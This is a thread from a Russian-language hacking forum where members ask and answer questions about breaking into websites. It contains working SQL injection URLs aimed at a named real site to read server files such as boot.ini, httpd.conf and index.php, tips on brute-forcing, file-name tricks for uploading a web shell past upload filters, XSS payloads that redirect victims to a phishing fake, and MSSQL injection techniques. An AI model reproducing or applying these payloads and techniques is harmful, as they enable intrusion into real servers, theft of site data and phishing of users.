Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Всем привет
    можно ли это как нибудь обойти?
    PHP:
    $kat htmlspecialchars($kat); 
    $kat str_replace('.','',$kat); 
    $kat str_replace('/','',$kat); 

    if (
    $_GET[file]) 

    file("$kat/$file1");
    }
    :D
     
  2. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    pojalusta pmoqite kak mojno zalivat shell ??
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('c:/boot.ini'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
    
    искать абсолютные пути, брутить
     
  4. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    Pashkela , izvini a kak i qde brutit ??

    kak moqu uznat drugie puti ??
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
     
    2 people like this.
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Паша, тебе лишь-бы логи засрать своей чудо программой.
    Ну сколько-же тебя просить не учить людей всякой херне =\

    LokbatanLi
    http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
    http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user

    PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
     
    6 people like this.
  7. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    судя по всему куки от wp <2.5, там пароль хранится в wordpresspass алгоритмом md5(md5())
     
    2 people like this.
  8. z0mbie86

    z0mbie86 Active Member

    Joined:
    25 Jul 2009
    Messages:
    38
    Likes Received:
    126
    Reputations:
    0
    У меня имееться xss. Я сделал чтобы была автоматическая переадресация на мой фейк таким образом:
    HTML:
    style=background:url('//') onerror=document.write
    Но это работает только в опере

    Для ie & firefox я сделал чтобы при наведении на текст переадресовывало на фейк:
    HTML:
    onmouseover=document.write
    Как сделать чтоб переадресация была автоматически в ie & firefox?
     
  9. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    net ne za defeysom sprasu..

    prosto ne moqu nayti path shtobi shell zalivat ??

    a dalse kto pomojet ??
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Тебе ж дали путь.

    На всякий случай почитай http://forum.antichat.ru/thread104591.html
     
  11. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    Помогтье загрузить шелл!Грузятся только изображния!остальное просто режется.
    файл типа shell.php режется к виду [какое либо число] без расширения
    т.е. shell.php будет подимене 8 без расширения
    shell.php.php
    shell.php%00.jpg
    .htaccess не катят
     
  12. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    shell.php3
    shell.phtml
    shell.php3.php
    shell.phtml.php
    shell.pHp
    shell.PHTmL
     
    2 people like this.
  13. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    wildshaman спс за ответ! какойто из способов помог!! оказалось зря шелл грузил и парился ((( очень суровые там условия!
     
  14. Tapaceuka

    Tapaceuka New Member

    Joined:
    13 Jan 2008
    Messages:
    111
    Likes Received:
    2
    Reputations:
    -6
    если я в каком либо чате нашёл XSS которая реагирует когда выполняется код (ппросмотр чата)
    то могу ли я туда сниффер поставить ?
     
  15. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Да. Это называется активная XSS.
     
    1 person likes this.
  16. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    есть пароль и логин о мускуля сайта. можно ли подключиться к нему? какой клиент посоветуете?
    phpmyadmin на сайте нет, через веб-интерфейс никак...
     
  17. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Всё зависит от пользователя MySQL. Если имя <имя>@localhost, то это значит, что удаленно подключится никак нельзя, лишь с локальной машины (если не ошибаюсь, то root@localhost - исключение. К нему можно подключаться удаленно). В таком случае можно только через шелл на сайте.

    Есть много хороших статей. Гугли "удаленное подключение MySQL". Самая первая неплохая.
     
    #11657 Sams, 6 Mar 2010
    Last edited: 6 Mar 2010
    1 person likes this.
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ну если надо вывести int через провоцирование ошибки, то тогда наоборот пробовать convert(text,(запрос)) или convert(char,(запрос))
     
  19. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Кто знает как вывести int значение в mssql инже. Т.е. есть табличка которую нужно проверить на записать (т.е. update). Но так как там все значения int, не получается проверить даже по условию.
    Пробывал кучу всего. Значения там точно есть, потому что я могу их использовать в условии и они работают. Вообщем у кого есть опыт по сабжу, прошу поделится.

    зы. Так как написал, Паша, не работает.

    зы2. Есть, я сделал это.. Через преобразования данных в xml. Т.е. (в конце просто дописуем - FOR XML RAW)
     
  20. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    Вообщем есть уязвимый скуль, доступен load_file() прочитал httpd.conf виртуал хост не прописан. есть ток Include /etc/apache2/sites-enabled/ пробовал прочитать /etc/apache2/sites-enabled/default пусто... попробовал /etc/apache2/sites-enabled/000-default
    выдает след
    единственная полезная запись
    DocumentRoot /srv/http/
    пробую подставлять папки и файлы куча не соответствий... вообщем не то.. и похожей директории не получается отыскать... может есть еще варианты узнать реальный путь
     
Thread Status:
Not open for further replies.